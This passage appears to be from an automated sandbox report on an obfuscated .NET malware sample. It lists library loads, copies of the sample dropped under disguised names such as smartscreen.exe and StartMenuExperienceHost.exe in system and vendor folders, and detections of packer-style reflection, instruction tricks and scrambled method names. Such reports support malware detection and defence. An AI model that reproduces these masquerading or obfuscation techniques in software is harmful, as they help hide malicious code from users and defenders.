Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: apphelp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 0JLWNg4Sz1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 0JLWNg4Sz1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 0JLWNg4Sz1.exe Static file information: File size 1688064 > 1048576
Source: 0JLWNg4Sz1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19ba00
Source: 0JLWNg4Sz1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs .Net Code: Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777245)),Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777259))})
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B7700BD pushad ; iretd 0_2_00007FFD9B7700C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D2ECA push esi; ret 0_2_00007FFD9B8D2ECB
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7800BD pushad ; iretd 6_2_00007FFD9B7800C1
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7A86E7 push ebp; ret 6_2_00007FFD9B7A86E8
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7B8167 push ebx; ret 6_2_00007FFD9B7B816A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8F60EC push ds; retf 6_2_00007FFD9B8F60EF
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E2ECA push esi; ret 6_2_00007FFD9B8E2ECB
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB23BAC pushfd ; retf 6_2_00007FFD9BB23BAE
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB23AE8 pushfd ; retf 6_2_00007FFD9BB23AE9
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2606B push ebx; retf 0007h 6_2_00007FFD9BB2610A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25FED push ebx; retn 0007h 6_2_00007FFD9BB2604A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25F5D push ebx; retn 0007h 6_2_00007FFD9BB2604A
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B7600BD pushad ; iretd 7_2_00007FFD9B7600C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B7800BD pushad ; iretd 25_2_00007FFD9B7800C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B7900BD pushad ; iretd 26_2_00007FFD9B7900C1
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7800BD pushad ; iretd 27_2_00007FFD9B7800C1
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7A86E7 push ebp; ret 27_2_00007FFD9B7A86E8
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B7886E7 push ebp; ret 28_2_00007FFD9B7886E8
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B7600BD pushad ; iretd 28_2_00007FFD9B7600C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B7886E7 push ebp; ret 29_2_00007FFD9B7886E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B7600BD pushad ; iretd 29_2_00007FFD9B7600C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7700BD pushad ; iretd 30_2_00007FFD9B7700C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7986E7 push ebp; ret 30_2_00007FFD9B7986E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7986E7 push ebp; ret 31_2_00007FFD9B7986E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7700BD pushad ; iretd 31_2_00007FFD9B7700C1
Source: 0JLWNg4Sz1.exe Static PE information: section name: .text entropy: 7.448087998754818
Source: DViaOgnvmAhwCXZ.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: DViaOgnvmAhwCXZ.exe0.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: smartscreen.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: 0JLWNg4Sz1.exe, wvEIle89Wa78kQmtPO1.cs High entropy of concatenated method names: 'EU885UEJAb', 'Wlh8xjW9tS', 'ela8Fknopr', 'plV534bcAIBGr3hTBX44', 'aGSdbabcIuTbZDWKIRfX', 'ndmwQEbcmIFKxpOPiRHp', 'IOlaDJbcP0eZns5wwCRr', 'LoD8l1YODX', 'xf48HB0x9k', 's868XVNmul'
Source: 0JLWNg4Sz1.exe, KaqhZtcES6ClRIhIKiH.cs High entropy of concatenated method names: 'UPPcTqWKmP', 'k6r', 'ueK', 'QH3', 'phhcKpo6by', 'Flush', 'lMLckfD32P', 'vGqc5Igt0x', 'Write', 'LGCcxwr2NT'
Source: 0JLWNg4Sz1.exe, rnSCIo4SY356mOYg6xJ.cs High entropy of concatenated method names: 'a8k4BMtQhS', 'vgNX6pbchLcATGJ8cmSy', 'n49HDdbc9UjjJT8iJPXN', 'KPUeBlbcrAff2AaPCifw', 'UJ6YODbcZdUL4sqWQbEX', 'VDcvH2bcjWgQJrOu30ZI', 'rN1YS3bclBoEK6yLY31j', 'nRu4JPFRRx', 'xww4UVXjZw', 'Uif4C2gyXb'
Source: 0JLWNg4Sz1.exe, M0P5Reg3OhBua3JFEbs.cs High entropy of concatenated method names: 'xEFgsAMCL5', 'AMJgiaOmF7', 'pXxgOTeMJ5', 'qDfg15rna4', 'UYpgNdTZbk', 'yOlR7IbXRbwSbK4w5a5l', 'B8jDoZbX40aYgnnLWQcO', 'wHQSLebXQtnIKdZsNXAI', 'eDooxvbXeJRJ2LQjIt3f', 'GurnVpbX3hmsf4UQRUus'
Source: 0JLWNg4Sz1.exe, U3MAduneXottqUEf6bE.cs High entropy of concatenated method names: 'f1vnpI4bgi', 'bTUnYysG3r', 'OmYnsLERrM', 'FJOniWQd54', 'MEynO6ZH1U', 'IZPn1mqmCW', 'RoSnNMVw8g', 'DSOnoo1e3L', 'oHmnWWk9gL', 'okCnSa8dsi'
Source: 0JLWNg4Sz1.exe, xA03rpSrrdcyjaXV34v.cs High entropy of concatenated method names: 'i5CSXFceJY', 'QZlS0IUlCm', 'FegS2w4y0o', 'tpJi2Ebh8Lb8VCY3UJIG', 'oD4co4bh4SGI541pRuFa', 'RCJoQybhA4aLcr5xIs8m', 'aQ3x7AbhIcN2Rfemciv1', 's7qShi6fIC', 'UpgS9CYfZY', 'aS7SjUFouM'
Source: 0JLWNg4Sz1.exe, yJj1Fl7EmMa94jy6Uni.cs High entropy of concatenated method names: 'Yh4kKMbG5Xh0PJ04F61W', 'vbL50QbGKmltjM9WhQug', 'qVbMZGbGkevO0jVGr3hx', 'nvI6JgbGx56YEmUwaAba', 'jpQ7TBvWBa', 'Mh9', 'method_0', 'ci87KNJSui', 'gFg7kphCwS', 'E0V755tEqC'
Source: 0JLWNg4Sz1.exe, K1KWTquHpDck1jMcI6Z.cs High entropy of concatenated method names: 'TlIu0mlljG', 'Vdhu271Kp5', 'KLOuyMJfZx', 'DH1uEwnGMt', 'RcKuGThJvD', 'lDHv75byrFFrRNhUybrY', 'QxL5BVbyZ3WA8nNfCMEU', 'ljYtbybyfeJ4iU9qpq2j', 'dOSx0NbyMVLlNS1RT2dm', 'axUNCZbyhZkUrgpVbh0x'
Source: 0JLWNg4Sz1.exe, gsIJJF8tgc6Kt27dkwS.cs High entropy of concatenated method names: 'fe68pWdh1r', 'gTsdoxbdZC2Fspgjcc4H', 'q7S5gYbdMCF999Rrt4q1', 'BmNvxEbdrSA3AlBfKXXa', 'JhttbKbdhYNJBLbu3sh4', 'CFiNx1bd9INowrYGSQFK', 'E94', 'P9X', 'vmethod_0', 'UHobALNJmxy'
Source: 0JLWNg4Sz1.exe, TQZFwlmIrZ94Ckj1ie0.cs High entropy of concatenated method names: 'VTPm4CpBdl', 'PjfmQiHqWr', 'ypymRt8q1s', 'DV2megEWrI', 'MwWgyLbBOBVDhPTmhCIg', 'NRPgxZbBslb3MYS02OMM', 'TuB7BVbBin1VL70pVV8R', 'kPhXombB1G7TCmnRtoKx', 'LcG07pbBNRhcQKiOUESt', 'T2stNkbBoe9CtcjDe67C'
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs High entropy of concatenated method names: 'zH8XtnbabSRQq9yG1Ljh', 'FKcJkhbamqmlJ65n4BNJ', 'L8vFKaRfXY', 'B6MjVfba81bWIgDFCTaM', 'OZ0hthba4LMTQoBKaPAy', 'MPsuxZbaQVmdjnfwA659', 'DiMmhnbaRQ4SFd7oj0gf', 'IDTRi0baesNdXtQ4Q7av', 'RqUlBGba3F948o5vfdau', 'OLdwE1baYiQXCH1fS66v'
Source: 0JLWNg4Sz1.exe, cqcxESRi8Qvb9t4Tgvw.cs High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'iOsgLkbq7s2M10pD9cEN', 'IAH09WbqqXwkKxrRt3iu', 'my6kvMbqfoxlsbNm0tFp', 'NMI5LxbqMA9kyAQEdpZq'
Source: 0JLWNg4Sz1.exe, KxK9Qybvk5n8x4G07sb.cs High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'z4ObQbBwwbR', 'PdlbAbXx1ob', 'tD77jFbwzeN2JvYn2qnu', 'LETqlmbB6Q9bSm4Q23pr', 'MCiQRfbBbTS73maCItFb', 'eEcCwYbBm7E3Uw8d9SjC'
Source: 0JLWNg4Sz1.exe, ooARSMLin5qekEb8tpe.cs High entropy of concatenated method names: 'lRCLLihWHh', 'I37XdLbhXtHKHxgdSgKN', 'DhlOhUbhlnNmbnKZ6YIP', 'LileNqbhHjZEOWoGKVvB', 'CpjL1UpJMG', 'SpJGN6bhraGUjRngI4hK', 'Cy74SLbhf74jmJERBHcI', 'lOuduJbhMn8c3Qa3Mm6a', 'JwWjBpbhZve8ht3D4nHp', 'DVCtuobhh1LJqMIXV5Hv'
Source: 0JLWNg4Sz1.exe, Kn8eXxtlnhiK1oa4UCS.cs High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'bKetXW5XQP', 'aivt0blEHP', 'Dispose', 'D31', 'wNK'
Source: 0JLWNg4Sz1.exe, i2aq4wrpD6Y5bc2DjVZ.cs High entropy of concatenated method names: 'HHbrc6Vg50', 'A8ur7vvgAB', 'Borrq2KiBQ', 'MmfrfXyfBA', 'lDLrMEI4EN', 'K5Nrrv69oo', 'Ob7rZklL0A', 'dB6rhEo0pr', 'v1tr9dkh3S', 'xi6rj5invC'
Source: 0JLWNg4Sz1.exe, mRZXS6Dpm1rHtQeiq6i.cs High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0JLWNg4Sz1.exe, TWhndcQNKwUpnrBVNCI.cs High entropy of concatenated method names: 'nqDQLR3Iir', 'qZPUApb7cH4xadES5qE3', 'WGtysgb7p0ob25jCb8yE', 'GjFZFJb7dVvBIh71d4Ql', 'qRxgKUb77u6BJsMCcXlE', 'MBdQWKnmyl', 'AG4aSPb7ggOFlBX8dQcw', 'Y6bSL8b7wNSOltY0V0en', 'EqouQyb7BrNk66pg7uSK', 'POMyR5b7t03uUkH0GFJf'
Source: 0JLWNg4Sz1.exe, Ssmwo8pF64YjXD4m3sZ.cs High entropy of concatenated method names: 'uhFpv3IPQx', 'G56pzDTgcR', 'D5Nd6bXk8h', 'owfdbYITc1', 'NZcdmvVBGf', 'XLwdPxsWxc', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 0JLWNg4Sz1.exe, P0wmQMnG47j70UOUgsZ.cs High entropy of concatenated method names: 'smJnKOxiXC', 'rM0nkMUdS9', 'PMqn5fypff', 'hfgnxMfK1l', 'XJsnFaYyYJ', 'DG55vcbl2IKksSZlxpEt', 'ILPABsblyCYwUPPSPF8a', 'SXMcLtblEXI0hkWurl4h', 'gLZOKrblGOR9QBKVCTVl', 'o6UIIRblTOPbcirf7OGq'
Source: 0JLWNg4Sz1.exe, did8cBSBSiw9xBIYVAt.cs High entropy of concatenated method names: 'NOUSfR9CN2', 'qKYBEgbZa5ppQxe84Xf1', 'rWtbTjbZxIE43ksx2ctx', 'eqobVNbZFwNbCreJ0f6W', 'JmkSuckgOj', 'WakSp13bV9', 'pJBSdfi0ho', 'JOoC4gbZKoLYTXAmDuER', 'qGQQPHbZkN2cPHLamCe5', 'WQppifbZGXxhLIF3kqLM'
Source: 0JLWNg4Sz1.exe, LcXJJV7Mfm5N28NO9Mo.cs High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LqX7Z6iNRV', 'VFK7hKAgEb', 'xO2795WGyF', 'YYK7jcROxN', 'u8r7lfC4aH', 'mZm7Hi8afT', 'wlBAPBbG7r9GX1NIXHwS'
Source: 0JLWNg4Sz1.exe, uEMWelmp6xeXiI6VZSX.cs High entropy of concatenated method names: 'opYm9omlr6', 'wVRmjbFyDD', 'RmdaF8bBhcM9m8G7uZq8', 'wSJ7KKbBrfLNQ8IAidry', 'TewlrZbBZg6i7nTwAPM3', 'rUx39ZbB9sTnnVM4qcg7', 'fMnm02VX4W', 'yiZvbNbBXmsygpwavyaM', 'AqVxsCbBldSMOauJh9oe', 'beM0XTbBHGoZsSWoFAfY'
Source: 0JLWNg4Sz1.exe, QsZr5IPgGuujSxCAeqQ.cs High entropy of concatenated method names: 'mWvPjYR93r', 'zxFPlQ5Lvl', 'pD4PHEsZt6', 'gCdaShbDHEwC1jbpXCgE', 'NDHqnlbDXlqkIZtMbL6C', 'RIeb23bDjZm11leXu3Nb', 'VZ9L8CbDlUnZYGtHnj1s', 'iNDPB30Yd0', 'RiUPDdDPtt', 'BqdPuiF4gp'
Source: 0JLWNg4Sz1.exe, rgnIQeIlr9OZA9ElV1Y.cs High entropy of concatenated method names: 'g2KIyS5KDe', 'RFjsR9bdm6S8r6FoL4TL', 'EqGvawbdP5ikb8IhIQ1y', 'kQtndobdArauXDaSIWIC', 'U1J', 'P9X', 'CB5bA1i5UGJ', 'FZhbANIkNWk', 'SwJbQ4NjuXr', 'imethod_0'
Source: 0JLWNg4Sz1.exe, F7oDlppQ7cuKQFlxLX5.cs High entropy of concatenated method names: 'fsapeyyWcY', 'eS0p3j9heS', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jK2pYyka8b', 'method_2', 'uc7'
Source: 0JLWNg4Sz1.exe, xXAvLnzYYgF1S8rWtx.cs High entropy of concatenated method names: 'WcxbbZfouC', 'J4ZbPCAJuX', 'wJcbAFsaYk', 'DrDbIeBv0j', 'xh8b8qtP5A', 'Nncb4fK2Sl', 'cr7bRUUtq6', 'Dvg705bwRqd9oCw9J2mw', 'CiJmR4bwe9OWnE80EppE', 'JfwkoWbw3OPRu9Xq7UDa'
Source: 0JLWNg4Sz1.exe, I8ZhR9cq9dQNRp8jSrL.cs High entropy of concatenated method names: 'Close', 'qL6', 'TjYcMv0lJX', 'EaHcrnvblD', 'k3xcZ3nKuy', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0JLWNg4Sz1.exe, v2VQvVbKRcWBkrETNK9.cs High entropy of concatenated method names: 'P9X', 'gQLb5ImlGV', 'KZcbQ6Oa4nK', 'imethod_0', 'q28bxZP6Sg', 'Mw8gn8bw5TBfBOj3Smo1', 'dfmZ6AbwxMT5kjlaWJuR', 'vhIR8jbwKTgVpAe8N2r6', 'mwW3Z3bwkCu4XqZmqaj9', 'wqChU7bwFSU1lBP23VNF'
